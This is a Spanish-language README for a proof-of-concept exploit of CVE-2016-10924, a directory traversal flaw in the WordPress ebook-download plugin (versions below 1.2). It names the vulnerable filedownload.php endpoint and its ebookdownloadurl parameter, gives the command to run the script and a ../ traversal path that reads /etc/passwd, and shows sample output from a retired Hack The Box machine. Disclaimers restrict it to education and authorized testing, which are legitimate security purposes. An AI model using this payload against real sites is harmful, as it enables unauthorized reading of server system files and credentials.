
Script de exploit de Prueba de Concepto (PoC) para la vulnerabilidad de Directory Traversal (CVE-2016-10924) encontrada en el plugin de WordPress ebook-download (versiones < 1.2). Esta vulnerabilidad permite lecturas de archivos no autorizadas mediante una solicitud GET manipulada.
Este repositorio contiene un script de exploit de prueba de concepto (PoC) para la vulnerabilidad de Directory Traversal (CVE-2016-10924) encontrada en el plugin de WordPress ebook-download (versiones < 1.2).
Esta vulnerabilidad permite la lectura no autorizada de archivos mediante una solicitud GET manipulada. El exploit aprovecha un parámetro llamado ebookdownloadurl para recorrer directorios en el servidor objetivo.
ebook-download < 1.2 para WordPress/etc/passwd, manipulando la ruta de archivo en el parámetro ebookdownloadurl.Nota: Este PoC es únicamente para fines educativos y de pruebas autorizadas. El uso indebido de esta información puede acarrear consecuencias legales.
requests (instálala con pip install requests)Clona el repositorio:
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
Instala las dependencias:
pip install requests
Ejecuta el exploit:
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
Especifica la ruta del archivo a leer: Después de lanzar el script, se te pedirá una ruta de archivo. Por ejemplo:
../../../../../../../../../etc/passwd
Es posible que debas ajustar el número de ../ según la ubicación de la raíz web en el entorno objetivo.
Salir:
exit, quit o pulsa Enter en un prompt vacío para salir.Usé este exploit en "Backdoor", una máquina retirada de Hack The Box:
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.
Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...
Este proyecto está destinado únicamente a fines educativos y de pruebas de seguridad legítimas.
No utilices la información o los scripts de este repositorio en ningún sistema para el que no tengas permiso explícito de prueba.
Los autores y colaboradores no se hacen responsables del mal uso o de los daños causados por esta herramienta.
Este proyecto está licenciado bajo la Licencia GNU 2.0. Siéntete libre de usarlo y modificarlo, pero por favor da crédito.
Referencias